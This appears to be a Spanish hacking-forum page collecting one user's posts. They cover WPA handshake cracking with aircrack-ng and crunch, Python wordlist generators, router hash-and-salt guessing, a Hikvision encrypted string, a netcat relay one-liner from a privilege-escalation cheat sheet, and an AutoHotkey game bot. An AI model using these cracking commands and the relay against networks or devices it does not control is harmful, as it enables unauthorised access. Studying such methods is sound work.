Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - AngelFire

#1
Buenas cuento con las siguientes direcciones MAC que de ellas se deriva los siguientes codigos.
Alguno es capaz de ver alguna asociacion, formula, logica, etc entre ellos.

MAC ADDRESS                      CODE
78:58:60:78:75:5C                  F1 ED D6 9B
78:58:60:78:E6:CC                 F1 F6 90 9B
20:F1:7C:4C:25:5C                4C 25 4D 74
78:58:60:7A:94:28                  F2 17 97 9B
8C:FD:18:EE:37:80                73 2F 68 9E
B4:FB:F9:B4:D2:6C               BC 39 20 9B
78:58:60:0D:75:08                 E6 F2 F2 9B
78:58:60:07:47:28                  E6 68 2F 9B
48:F8:DB:2B:E9:F8                ?? ?? ?? ??

Gracias por leer. Cualquier recomendacion es bienvenida.
#2
Seguridad / Ayuda con encryptstring HIKVISION
14 Marzo 2020, 06:17 AM
Alguna referencia, documentación, ayuda, etc:
Para este encryptado sacado mediante SADP Tool de una Hikvision DS-7116HGHI-F1

<EncryptString>AwAAALqA1FxNkt8yiDIW7N8ziyTjEydftUOfVMQE6qXi8c3yfWAp7fWGg1UCq1HS/PriXgmCSUQ6BP1JPTMjZdhr8Td2lk6+7L+5AFNX9C5mvAWekRmZVLoNAxuchCoPDKrJXOcnWm/OLK7sYcfxmn6dSO3S8djvFo2zfUDzeRYE6XDT</EncryptString>

Gracias por leer. ;D

AngelFire


#3
Hacking / Problema con hash256 + salt.
9 Noviembre 2019, 20:05 PM
Intro
Si se tiene una contraseña --> pepe123
y se aplica la funcion --> sha256(md5(pepe123))

Quedaria:
MD5(pepe123) --> 7edede46f596b580cd10469463987280
SHA256(7edede46f596b580cd10469463987280) -->
5e023ea5ef7edf956f28ddbca1be64b1f92c03f4ec157c6ee54bd021454c3bf8

Por lo que si se le desea hacer ataque mediante diccionario o fuerza bruta, solo habria que seguir la funcion sha256(md5($password)) buscando que el hash generado coincida con el que se este probando en cuestion  ;D.

Problema:
Tengo la contraseña. ClrHwOntoLT!5
Tengo el hash256  Password="66b4d8b1cd542de72cf847b20d869b2a882a46751b71bffb8aa2eda10c1e0483" (varia con cada reinicio del router)
Tengo la salt Salt="4be3f31fa33ff3236dacfa61"(varia con cada reinicio del router)
Pero no tengo la funcion aplicada.

Ya probe las siguiente sin obtener resultado satisfactorio  :-\.
10  md5($pass.$salt)  luego sha256
20  md5($salt.$pass) luego sha256
1410  sha256($pass.$salt)
1420  sha256($salt.$pass)
3610  md5(md5($salt).$pass) luego sha256
3710  md5($salt.md5($pass)) luego sha256
3800  md5($salt.$pass.$salt) luego sha256
3910  md5(md5($pass).md5($salt)) luego sha256
4010  md5($salt.md5($salt.$pass)) luego sha256
4110  md5($salt.md5($pass.$salt)) luego sha256
20710   sha256(sha256($pass).$salt)

Existe alguna herramienta o script que ayude con este tema de identificar que funcion se puede haber usado teniendo como partida el HASH la  SALT y la contraseña?

O una lista de las mezclas mas comunes.

Saludos y gracias por leer.

#4
Hacking / Elevacion de privilegios en linux
13 Enero 2019, 20:16 PM
Para los que gustan de las CTF (Capture the Flags) donde siempre en estas pruebas se buscan las flags (banderas ) notaran que una de las practicas clasicas asi como subir la shell o lograr acceso remoto a la virtual vulnerable, es la elevacion de privilegios en linux por lo que me parece que esto sera de ayuda para muchos.

Aqui la info http://hacknode.blogspot.com/2011/08/elevacion-de-privilegios-en-linux-cheat.html algo vieja pero util.

Disculpen no poner info previa  :-\ pero el foro arroja el foro un error. Los moderadores pueden explicar mas sobre esto y que codigos expuesto en ese post son prevenidos en su sistema WAF.

Texto del error:

Web Application Firewall (WAF) Blocked

::CAPTCHA_BOX::
Una regla de seguridad ha sido aplicada. Si crees que es un error (falso positivo) contacta con webmaster@elhacker.net. Gracias.


nc -l -p 8080  < backpipe  | n_c 10.1.1.251 80 >backpipe

Al parecer unas de las lineas que arroja el error es una como la anterior, cambiar n_c por nc.
#5

Una de las mejores formas para auditar un handshake obtenidos de WPA/WPA2 es mediante el uso de Aircrack combinado con Wordlist o Diccionarios, como podemos contemplar en la mayoria de videos, tutoriales o finalmente en la practica.

A pesar de tener mis mejores resultados, simplemente con el mas básico, pequeño y potente wordlist "rockyou" disponible en muchas distros o también en http://www.wordbook.xyz/download/big/rockyou.rar; o mejorando los aciertos con el excelente trabajado de Probable Wordlists - Version 2.0 basado mas de 350GB en contraseñas reales de fugas en internet y disponible en https://github.com/berzerk0/Probable-Wordlists; o haciendo uso de Aircrack + Crunch crunch 8 8 0123456789 -s 00000000 -e 99999999 | aircrack -e test proof.cap -w - valorando que un gran % de usuarios solo elabora sus contraseñas con números por absurdo que parezca.

Siempre me queda esa inconformidad de ver pasar tiempo perdido en la mayoria de las pasadas de aircrack en compañia de g0tm1k-wordlist 39GB  http://www.wordbook.xyz/download/big/g0tmi1k-wordlist.rar o el igual pontente diccionario  WPA-PSK-WORDLIST-3Final publicado por hak5 13GB http://www.wordbook.xyz/download/big/WPA-PSK-WORDLIST-3Final.rar
. Que a pesar de ser igual de buenos no aplican en la mayoria de los handshakes obtenidos de usuarios de habla hispana. Incluso en los que obtenemos los aciertos estan altamente llenos de contraseñas muy poco probable en usuarios que hablan español, lo que se traduce en espacio y tiempo desperdiciado.

¿Donde radica el problema y solicito ayuda de los lectores?

Absolutamente casi todos los mejores proyectos o wordlist que he descargado de la internet son predominantes en idioma ingles, lo cual era de esperarse pero para usuarios de habla hispana no es lo realmente optimo. Igual sucede con los nombres y apellidos donde muchos haciendo usos de estos y a veces completando con numeros de 2 o 4 digitos conforman sus contraseñas. Solo falta ver corriendo Aircrack en compañia de los wordlist sobre nuestras capturas de handshakes y ver la cantidad de palabras que estamos claros jamas serian un acierto para usuarios hispanos. 


Existe alguien en este grupo que conozca donde descargar diccionarios pensados para usuarios de habla hispana o simplemente cada cual se crea uno atendiendo a sus necesidades. O que recomemiende rules o filtros mediante comandos o programacion para depurar y crear algo realmente optimo y eficiente para estos casos de contraseñas pensadas en español. O que pueda aportar sus experiencias auditando WPA/WAP2.

Aprovecho la oportunidad para saludar y agradecer a todo aquel que se tomo un tiempo en leerme.

Quizas algo fuera de tiempo considerando que estamos ya arriba de WPA3  :silbar:
#6
Scripting / Expresiones Regulares y wordlist.
5 Junio 2018, 04:06 AM
Analizando y leyendo sobre el tema de fuerza bruta y cediendo al final como muchos cuando se entiende las limitantes para contraseñas a partir de los 8 caracteres con 10 numeros+26minusculas+26mayusculas+33caracteres especiales opto por pasar mejor a diccionarios o los conocidos wordlist  ;D.  Donde me encuentro 2 claros problemas entre muchos, la mayoría de las contraseñas contenida en los wordlist corresponde al ingles por lo que aplicarlo a contraseñas pensadas en español lo convierten en algo inútil, segundo al irnos a las innumerable fuentes de Internet la cantidad de contraseñas a manipular es tan grande como deseemos  y contener gran cantidad de repetidas es algo que reduce la eficiencia aunque en estadísticas sirve para organizar por frecuencia de uso.
Por dicho motivo he decidido fragmentar y filtrar la información ya que trabajar con grandes ficheros de contraseñas q no es algo que este muy difundido en Internet o al menos no encuentro nada relacionado.

Sin dudas python es la herramienta ideal para gestionar esta big data.
Comparto parte de mi código con el objetivo que algunos de los cerebros que andan en este foro sugieran modificaciones para hacerlo mas eficiente ya que eso de un for dentro de otro y asi no creo que sea la mejor forma aunque de momento medio funciona.

Estoy claro que es algo muy básico y no hace ni la mitad de lo que debería pero de comienzo se me ocurre clasificar todo en alphanumericos, symbols para los caracteres especiales y numeros para las contraseñas de solo números.

Sin mas aqui una version muy alpha de lo que quiero

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import re

#Criterio de fragmentacion.
#0 1 2 3 4 5 6 7 8 9

#a b c d e f g h i j
#k l m n o p q r s t
#u v w x y z

#A B C D E F G H I J
#K L M N O P Q R S T
#U V W X Y Z

#! " # $ % & ' ( ) *
#+ , - . / : ; < = >
#? @  [ \ ] ^ _ ` { |
#} ~

#FIX
#\$ \' \( \) \* \+ \. \? \[ \\\\ \^ \|

char = ['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','!','"','#','\$','%','&','\'','\(','\)','\*','\+',',','-','\.','/',':',';','<','=','>','\?','@','\[','\\\\',']','\^','_','`','{','\|','}','~', ' ']



#Solicitud de wordlist a fragmentar segun criterio de fragmentacion.
v = raw_input('Introduce el fichero a procesar: ')
f = open(v,'r')
lineas = f.readlines()
f.close()

i=0
d=0

#Eliminar lineas en blanco en el fichero a fragmentar.
f = open(v,'w')

for linea in lineas:
if len(linea) > 1:
f.write(linea)

#Eliminar duplicado en el fichero a fragmentar.
content = open(v,'r').readlines()
content_set = set (content)
cleandata = open (v,'w')

for line in content_set:
cleandata.write(line)

cleandata.close()

f = open(v,'r')
lineas = f.readlines()
f.close()

#Clasificar en (Numeros [0-9],26 minusculas [a-z], 26 mayusculas [A-Z],Symbols 33 caracteres especiales [!- ]).
for i in range (95):
patterns = [char[i]]
for pattern in patterns:
for linea in lineas:
if re.match(pattern,  linea):
if i > 36:
if i < 62:
fn = open(char[i]+'_','a')
fn.writelines(linea)
else:
f = open('Symbols','a')
f.writelines(linea)
else:
f = open(char[i],'a')
f.writelines(linea)
else:
d=d+1


Igual lo iré mejorando ya que la idea es irle pasando wordlist y que se fragmente organizadamente para posterior uso en los diferentes programas de fuerza bruta. Evitar duplicados, poder buscar si contienen una contraseña en especifico sino agregarla etc. Como pueden ver no solo necesito mejoras de programación sino ademas mejoras de ideas para finalmente hacernos de nuestro potente wordlist.

Saludos.



#7
trabajando un wordlist contenido en un fichero txt, me quedan muchas lineas que contienen caracteres rusos, asi como caracteres no imprimibles.
Alguna sugerencia de como me puedo deshacer de estos mediante el uso de expresiones regulares en python.

Saludos y gracias por leer.

Pequeña muestra del fichero

aleks san
лиля1111
таня1993
0987654321_
07728891
ЙФЯЧВУ
campari
erdons2
генрик
ze7ery9y
cachorrito
#8
WarZone / Hack-Web_EAS
31 Octubre 2017, 13:12 PM
Hola a todos, sirdarckcat,  el tema es bien sencillo. Es solo para saber si la prueba Hack-Web_EAS del warzone esta funcional puesto que cuando se entra con el usuario sugerido AL1954 contend81 dice que el enlace fue movido y al seguirlo nos tira hacia el blog. ¿Es esto normal?


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://blog.elhacker.net">here</a>.</p>
</body></html>
#9
Scripting / Wordlist Pyhon
8 Octubre 2017, 07:57 AM
Alguien me ayuda en el siguiente codigo creado en python a eliminar salidas de 5 consonantes [bcdfghjklmnpqrstvwxyz] continuas, asi como cualquier otra optimizacion basica que consideren enfocado a fuerza bruta pero no tan bruta ya que  se intenta excluir las combinaciones poco probables, de repeticiones tipo aaaaaaaa o 5 a mas consonantes continuas.

Saludos

Lo necesito para luego hacer algo como:
#python wordlist.py | aircrack-ng -a 2 -e AP AP-01.cap -w -

#Wordlist Alpha desarrollado en Python by AngelFire
#-----------------------Caracteristicas--------------------------------------------------
#Genera salida de 8 caracteres.
#Se ignoran las combinaciones:
# -que terminan en b,c,f,g,h,j,k,m,p,q,t,v,w,x.
# -de 2 caracteres repetidos continuos; exclusiones
#   a considerar(rr, ll, 11, 22, 33, 44, 55, 66, 77, 88, 99, 00)
#Considerar sustituciones de tipos:
#a=@ or A=4
#e=3
#i=1
#o=0
#s=5
#a la hora de crear el char.
#Sustituir en char los caracteres a combinar.
char = 'abcdefghijklmnopqrstuvwxyz'
a = 0
b = 0
c = 0
d = 0
e = 0
f = 0
g = 0
h = 0
#abcdefgh ---> 8 CARACTERES
for a in range(len(char)):
#bcdefgh  ---> 7 CARACTERES
for b in range(len(char)):
if char[a]!=char[b]:
#cdefgh   ---> 6 CARACTERES
for c in range(len(char)):
if char[b]!=char[c]:
#defgh    ---> 5 CARACTERES
for d in range(len(char)):
if char[c]!=char[d]:
#efgh     ---> 4 CARACTERES
for e in range(len(char)):
if char[d]!=char[e]:
#fgh      ---> 3 CARACTERES
for f in range(len(char)):
if char[e]!=char[f]:
#gh       ---> 2 CARACTERES
for g in range(len(char)):
if char[f]!=char[g]:
#h        ---> 1 CARACTERES
for h in range(len(char)):
low = char[a]+char[b]+char[c]+char[d]+char[e]+char[f]+char[g]+char[h]
if char[g]!=char[h]:
if char[h]!= 'b':
if char[h]!= 'c':
if char[h]!= 'f':
if char[h]!= 'g':
if char[h]!= 'h':
if char[h]!= 'j':
if char[h]!= 'k':
if char[h]!= 'm':
if char[h]!= 'p':
if char[h]!= 'q':
if char[h]!= 't':
if char[h]!= 'v':
if char[h]!= 'w':
if char[h]!= 'x':
print (low)


#10
Scripting / Brute Force en Python hacia un DMG
21 Febrero 2017, 09:59 AM
Buenas, sin saber mucho de python se me ha ocurrido hacer este script para sacar la key de un fichero .dmg (058-07911-219.dmg) contenido en un fichero .ipsw (iPad2,1_9.0_13A344_Restore.ipsw). Algo que según tengo entendido por la cantidad combinaciones es imposible de romper en la actualidad ya que hablamos de una longitud de 72 caracteres en formato hexadecimal. Por lo cual he tomado un random en el incremento del conteo para poder jugar con el factor suerte que no esta de nuestro lado  ;D si nos vamos a probabilidades.

Evidentemente la key de ese fichero no se obtuvo mediante fuerza bruta.

La duda:
¿Si por casualidad de la vida se generará la key valida de 72 caracteres en formato hexdecimal (f44e1a776ad2f2f2d8ecc2befee610ea4536a37713a83db0396835c74c1b2af3343fd433), como notificar o detener el script?

Código (Python) [Seleccionar]
import time
import os
import random

def gen_all_hex():
   i = 0
   while i < 16**72:
       yield "{:072X}".format(i)
       #i += 1
       i += random.randint(1, 1)
       time.sleep(.1) # Wait 100ms
               

for s in gen_all_hex():
   print (s)
   os.system('%s %s' % ('dmg.exe extract 058-07911-219.dmg 058-07911-219d.dmg -k', s))
   #os.system('dmg.exe extract 058-07911-219.dmg 058-07911-219d.dmg -k f44e1a776ad2f2f2d8ecc2befee610ea4536a37713a83db0396835c74c1b2af3343fd433')


Para mas información sobre lo que intento con mi absurdo script pueden referirse a https://www.theiphonewiki.com/wiki/Firmware_Keys/9.x

Gracias por leer y cualquier comentario o contribución es bienvenida. :rolleyes:
#11
Redes / Duda con ip estático.
6 Junio 2016, 02:54 AM
No consigo una ip estatica en mi ISP.
Uso windows 10 x64bit y si activo DHCP, el cliente conecta sin problema me asigna todo los datos de red:
IP
Mascara
Puerta de enlace
DNS 1
DNS 2

Pero si pongo esos mismo valores no consigo que se conecte y quedarme con esos valores estaticos.
Alguien tiene la mas minima idea de porque no puedo entrar los valores manuales y no funciona incluso cuando pongo los mismos que me asigna el DHCP del ISP.

Saludos

AngelFire
#12
Scripting / Simplificar javascript
9 Marzo 2016, 20:22 PM
Buenas me preguntaba si existe alguna de simplificar las siguientes funciones de java que claramente lo hice a lo bruto y funcionan. Pero se que no son correcta mas mis conocimientos de javascript son muy basicos. Gracias por cualquier respuesta critica o x de antemano.

Funcion 1multiplica una columna por su valir adyacente que como estaba en un tr y no sabia como obtenerlo fui paciente poniendo los numero :)
<script>
function mult2() {
var n2 = parseInt(document.inputOrder.inputQuantity2.value);
document.inputOrder.inputCost2.value=n2*700;
}
function mult3() {
var n3 = parseInt(document.inputOrder.inputQuantity3.value);
document.inputOrder.inputCost3.value=n3*830;
}
function mult5() {
var n5 = parseInt(document.inputOrder.inputQuantity5.value);
document.inputOrder.inputCost5.value=n5*1100;
}
function mult6() {
var n6 = parseInt(document.inputOrder.inputQuantity6.value);
document.inputOrder.inputCost6.value=n6*500;
}
function mult7() {
var n7 = parseInt(document.inputOrder.inputQuantity7.value);
document.inputOrder.inputCost7.value=n7*700;
}
function mult8() {
var n8 = parseInt(document.inputOrder.inputQuantity8.value);
document.inputOrder.inputCost8.value=n8*1850;
}
function mult9() {
var n9 = parseInt(document.inputOrder.inputQuantity9.value);
document.inputOrder.inputCost9.value=n9*2000;
}
function mult10() {
var n10 = parseInt(document.inputOrder.inputQuantity10.value);
document.inputOrder.inputCost10.value=n10*700;
}
function mult13() {
var n13 = parseInt(document.inputOrder.inputQuantity13.value);
document.inputOrder.inputCost13.value=n13*700;
}
function mult14() {
var n14 = parseInt(document.inputOrder.inputQuantity14.value);
document.inputOrder.inputCost14.value=n14*700;
}
function mult16() {
var n16 = parseInt(document.inputOrder.inputQuantity16.value);
document.inputOrder.inputCost16.value=n16*700;
}
function mult18() {
var n18 = parseInt(document.inputOrder.inputQuantity18.value);
document.inputOrder.inputCost18.value=n18*700;
}
function mult27() {
var n27 = parseInt(document.inputOrder.inputQuantity27.value);
document.inputOrder.inputCost27.value=n27*550;
}
function mult28() {
var n28 = parseInt(document.inputOrder.inputQuantity28.value);
document.inputOrder.inputCost28.value=n28*700;
}
function mult32() {
var n32 = parseInt(document.inputOrder.inputQuantity32.value);
document.inputOrder.inputCost32.value=n32*1100;
}
function mult33() {
var n33 = parseInt(document.inputOrder.inputQuantity33.value);
document.inputOrder.inputCost33.value=n33*500;
}
function mult35() {
var n35 = parseInt(document.inputOrder.inputQuantity35.value);
document.inputOrder.inputCost35.value=n35*800;
}


Funcion 2 Suma una columna
function cost() {
var s1 = parseInt(document.inputOrder.inputCost1.value);
var s2 = parseInt(document.inputOrder.inputCost2.value);
var s3 = parseInt(document.inputOrder.inputCost3.value);
var s4 = parseInt(document.inputOrder.inputCost4.value);
var s5 = parseInt(document.inputOrder.inputCost5.value);
var s6 = parseInt(document.inputOrder.inputCost6.value);
var s7 = parseInt(document.inputOrder.inputCost7.value);
var s8 = parseInt(document.inputOrder.inputCost8.value);
var s9 = parseInt(document.inputOrder.inputCost9.value);
var s10 = parseInt(document.inputOrder.inputCost10.value);
var s11 = parseInt(document.inputOrder.inputCost11.value);
var s12 = parseInt(document.inputOrder.inputCost12.value);
var s13 = parseInt(document.inputOrder.inputCost13.value);
var s14 = parseInt(document.inputOrder.inputCost14.value);
var s15 = parseInt(document.inputOrder.inputCost15.value);
var s16 = parseInt(document.inputOrder.inputCost16.value);
var s17 = parseInt(document.inputOrder.inputCost17.value);
var s18 = parseInt(document.inputOrder.inputCost18.value);
var s19 = parseInt(document.inputOrder.inputCost19.value);
var s20 = parseInt(document.inputOrder.inputCost20.value);
var s21 = parseInt(document.inputOrder.inputCost21.value);
var s22 = parseInt(document.inputOrder.inputCost22.value);
var s23 = parseInt(document.inputOrder.inputCost23.value);
var s24 = parseInt(document.inputOrder.inputCost24.value);
var s25 = parseInt(document.inputOrder.inputCost25.value);
var s26 = parseInt(document.inputOrder.inputCost26.value);
var s27 = parseInt(document.inputOrder.inputCost27.value);
var s28 = parseInt(document.inputOrder.inputCost28.value);
var s29 = parseInt(document.inputOrder.inputCost29.value);
var s30 = parseInt(document.inputOrder.inputCost30.value);
var s31 = parseInt(document.inputOrder.inputCost31.value);
var s32 = parseInt(document.inputOrder.inputCost32.value);
var s33 = parseInt(document.inputOrder.inputCost33.value);
var s34 = parseInt(document.inputOrder.inputCost34.value);
var s35 = parseInt(document.inputOrder.inputCost35.value);
var s36 = parseInt(document.inputOrder.inputCost36.value);
var s37 = parseInt(document.inputOrder.inputCost37.value);
var s38 = parseInt(document.inputOrder.inputCost38.value);
var s39 = parseInt(document.inputOrder.inputCost39.value);
document.inputOrder.inputCost40.value=s1+s2+s3+s4+s5+s6+s7+s8+s9+s10+s11+s12+s13+s14+s15+s16+s17+s18+s19+s20+s21+s22+s23+s24+s25+s26+s27+s28+s29+s30+s31+s32+s33+s34+s35+s36+s37+s38+s39;
}


Afortunadamente son unas pocas celdas :) pero algún día podía tocarme mas y para entonces espero alguno de usted me diga como enfrentarme al fenómeno. Creo que con un array o for se conseguiría pero recién entro en javascript.
Gracias por leer.
#13
Scripting / Jugando con AutoHotkey
24 Noviembre 2015, 04:11 AM
Bueno le comparto algo de mi código no estando aun conforme con el mismo por lo que agradezco cualquier modificación o recomendación.
Requisitos:
Bluestack ------> http://www.bluestacks.com/
Bitcoin Basketball ------> http://bitplay.today/
AutoHotkey ------> https://www.autohotkey.com/
Windows 7 o Superior.

Script .ahk version 1
WinWait, BlueStacks App Player,
IfWinNotActive, BlueStacks App Player
WinActivate, BlueStacks App Player
WinWaitActive, BlueStacks App Player

;Presionar F12 para comenzar
F12::


Loop 10
{

CoordMode Pixel
ImageSearch, X, Y, 700, 400, 830, 490,*100 Start.bmp
If Errorlevel = 0
Click %X%, %Y%

Random, L , 19, 21
Loop %L%
{
Random, X1 , 605, 615
Random, Y1 , 240, 250
Random, X2 , 690, 700
Random, Y2 , 305, 315
Random, T , 10, 20 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1 , 600, 800


MouseClickDrag, Left, X1, Y1, X2, Y2 , %T%
Sleep, %T1%

}
Random, T2 , 5000, 7000
Sleep, %T2%
}

Esc:: ExitApp


Script .ahk version 2
WinWait, BlueStacks App Player,
IfWinNotActive, BlueStacks App Player
WinActivate, BlueStacks App Player
WinWaitActive, BlueStacks App Player
debug := 0
;Presionar F12 para comenzar

F11::
Pause
Suspend
return

F12::
Loop
{
Send {Click 660, 245, Down}
Sleep, 1000
CoordMode Pixel
ImageSearch, X, Y, 500, 170, 700, 330,*150 Ball.bmp
Sleep, 500
If ( Errorlevel = 0 )
{
Send {Click 665, 250, Up}
}
ImageSearch, X, Y, 500, 170, 700, 330,*170 Coin.bmp
If ( Errorlevel = 0 )
{
Send {Click 740, 325, Up}
Sleep, 500
}
Send {Click 740, 325, Up}
}
Esc:: ExitApp

Script .ahk version 3
WinWait, BlueStacks App Player,
IfWinNotActive, BlueStacks App Player
WinActivate, BlueStacks App Player
WinWaitActive, BlueStacks App Player
debug := 0
;Presionar F12 para comenzar

F11::
Pause
Suspend
return

F12::
Loop
{
CoordMode Pixel
ImageSearch, X, Y, 700, 400, 830, 490,*100 Start.bmp
If ( Errorlevel = 0 )
{
X := X + 15
Y := Y + 15
Click %X%, %Y%
}
ImageSearch, X, Y, 495, 105, 675, 140,*100 P10.bmp ; 10
If ( Errorlevel = 0 )
{
Random, X1P10 , 660, 661
Random, Y1P10 , 245, 246
Random, X2P10 , 740, 741
Random, Y2P10 , 325, 335
Random, TP10 , 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1P10 , 140, 150
MouseClickDrag, Left, X1P10, Y1P10, X2P10, Y2P10 , %TP10%
Sleep, %T1P10%
}
ImageSearch, X, Y, 495, 105, 675, 140,*100 P9.bmp ; 9
If ( Errorlevel = 0 )
{
Random, X1P9 , 665, 666
Random, Y1P9 , 245, 246
Random, X2P9 , 745, 746
Random, Y2P9 , 325, 335
Random, TP9 , 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1P9 , 140, 150
MouseClickDrag, Left, X1P9, Y1P9, X2P9, Y2P9 , %TP9%
Sleep, %T1P9%
}
ImageSearch, X, Y, 495, 105, 675, 140,*100 P8.bmp ; 8
If ( Errorlevel = 0 )
{
Random, X1P8 , 670, 671
Random, Y1P8 , 245, 246
Random, X2P8 , 750, 751
Random, Y2P8 , 325, 335
Random, TP8 , 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1P8 , 140, 150
MouseClickDrag, Left, X1P8, Y1P8, X2P8, Y2P8 , %TP8%
Sleep, %T1P8%
}
ImageSearch, X, Y, 495, 105, 675, 140,*100 P7.bmp ; 7
If ( Errorlevel = 0 )
{
Random, X1P7 , 675, 676
Random, Y1P7 , 245, 246
Random, X2P7, 755, 756
Random, Y2P7 , 325, 335
Random, TP7 , 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1P7 , 140, 150
MouseClickDrag, Left, X1P7, Y1P7, X2P7, Y2P7 , %TP7%
Sleep, %T1P7%
}
ImageSearch, X, Y, 495, 105, 675, 140,*100 P6.bmp ; 6
If ( Errorlevel = 0 )
{
Random, X1P6 , 680, 681
Random, Y1P6 , 245, 246
Random, X2P6 , 760, 761
Random, Y2P6 , 325, 335
Random, TP6, 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1P6 , 140, 150
MouseClickDrag, Left, X1P6, Y1P6, X2P6, Y2P6 , %TP6%
Sleep, %T1P6%
}
ImageSearch, X, Y, 495, 105, 675, 140,*100 P5.bmp ; 5
If ( Errorlevel = 0 )
{
Random, X1P5 , 685, 686
Random, Y1P5 , 245, 246
Random, X2P5, 765, 766
Random, Y2P5, 325, 335
Random, TP5 , 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1P5 , 140, 150
MouseClickDrag, Left, X1P5, Y1P5, X2P5, Y2P5 , %TP5%
Sleep, %T1P5%
}
ImageSearch, X, Y, 495, 105, 675, 140,*100 P4.bmp ; 4
If ( Errorlevel = 0 )
{
Random, X1P4 , 690, 691
Random, Y1P4 , 245, 246
Random, X2P4 , 770, 771
Random, Y2P4 , 325, 335
Random, TP4 , 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1P4 , 140, 150
MouseClickDrag, Left, X1P4, Y1P4, X2P4, Y2P4 , %TP4%
Sleep, %T1P4%
}
ImageSearch, X, Y, 495, 105, 675, 140,*100 P3.bmp ; 3
If ( Errorlevel = 0 )
{
Random, X1P3 , 695, 696
Random, Y1P3 , 245, 246
Random, X2P3 , 775, 776
Random, Y2P3 , 325, 335
Random, TP3 , 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1P3 , 140, 150
MouseClickDrag, Left, X1P3, Y1P3, X2P3, Y2P3 , %TP3%
Sleep, %T1P3%
}
ImageSearch, X, Y, 495, 105, 675, 140,*100 P2.bmp ; 2
If ( Errorlevel = 0 )
{
Random, X1P2 , 700, 701
Random, Y1P2 , 245, 246
Random, X2P2 , 780, 781
Random, Y2P2 , 325, 335
Random, TP2 , 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1P2 , 140, 150
MouseClickDrag, Left, X1P2, Y1P2, X2P2, Y2P2 , %TP2%
Sleep, %T1P2%
}
ImageSearch, X, Y, 495, 105, 675, 140,*100 P1.bmp ; 1
If ( Errorlevel = 0 )
{
Random, X1P1 , 705, 706
Random, Y1P1 , 245, 246
Random, X2P1 , 785, 786
Random, Y2P1 , 325, 335
Random, TP1 , 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1P1 , 140, 150
MouseClickDrag, Left, X1P1, Y1P1, X2P1, Y2P1 , %TP1%
Sleep, %T1P1%
}
ImageSearch, X, Y, 495, 105, 675, 140,*100 Cero.bmp ; Wind 0
If ( Errorlevel = 0 )
{
Random, X10 , 710, 711
Random, Y10 , 245, 246
Random, X20 , 790, 791
Random, Y20 , 325, 335
Random, T0 , 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T10 , 140, 150
MouseClickDrag, Left, X10, Y10, X20, Y20 , %T0%
Sleep, %T10%
}
ImageSearch, X, Y, 495, 105, 675, 140,*100 N1.bmp ; -1
If ( Errorlevel = 0 )
{
Random, X1N1 , 715, 716
Random, Y1N1 , 245, 246
Random, X2N1 , 795, 796
Random, Y2N1 , 325, 335
Random, TN1 , 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1N1 , 140, 150
MouseClickDrag, Left, X1N1, Y1N1, X2N1, Y2N1 , %TN1%
Sleep, %T1N1%
}
ImageSearch, X, Y, 495, 105, 675, 140,*100 N2.bmp ; -2
If ( Errorlevel = 0 )
{
Random, X1N2 , 720, 721
Random, Y1N2 , 245, 246
Random, X2N2 , 800, 801
Random, Y2N2 , 325, 335
Random, TN2 , 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1N2 , 140, 150
MouseClickDrag, Left, X1N2, Y1N2, X2N2, Y2N2 , %TN2%
Sleep, %T1N2%
}
ImageSearch, X, Y, 495, 105, 675, 140,*100 N3.bmp ; -3
If ( Errorlevel = 0 )
{
Random, X1N3 , 725, 726
Random, Y1N3 , 245, 246
Random, X2N3 , 805, 806
Random, Y2N3 , 325, 335
Random, TN3 , 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1N3 , 140, 150
MouseClickDrag, Left, X1N3, Y1N3, X2N3, Y2N3 , %TN3%
Sleep, %T1N3%
}
ImageSearch, X, Y, 495, 105, 675, 140,*100 N4.bmp ; -4
If ( Errorlevel = 0 )
{
Random, X1N4 , 730, 731
Random, Y1N4 , 245, 246
Random, X2N4 , 810, 811
Random, Y2N4 , 325, 335
Random, TN4 , 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1N4 , 140, 150
MouseClickDrag, Left, X1N4, Y1N4, X2N4, Y2N4 , %TN4%
Sleep, %T1N4%
}
ImageSearch, X, Y, 495, 105, 675, 140,*100 N5.bmp ; -5
If ( Errorlevel = 0 )
{
Random, X1N5 , 735, 736
Random, Y1N5 , 245, 246
Random, X2N5 , 815, 816
Random, Y2N5 , 325, 335
Random, TN5 , 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1N5 , 140, 150
MouseClickDrag, Left, X1N5, Y1N5, X2N5, Y2N5 , %TN5%
Sleep, %T1N5%
}
ImageSearch, X, Y, 495, 105, 675, 140,*100 N6.bmp ; -6
If ( Errorlevel = 0 )
{
Random, X1N6 , 740, 741
Random, Y1N6 , 245, 246
Random, X2N6 , 820, 821
Random, Y2N6 , 325, 335
Random, TN6 , 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1N6 , 140, 150
MouseClickDrag, Left, X1N6, Y1N6, X2N6, Y2N6 , %TN6%
Sleep, %T1N6%
}
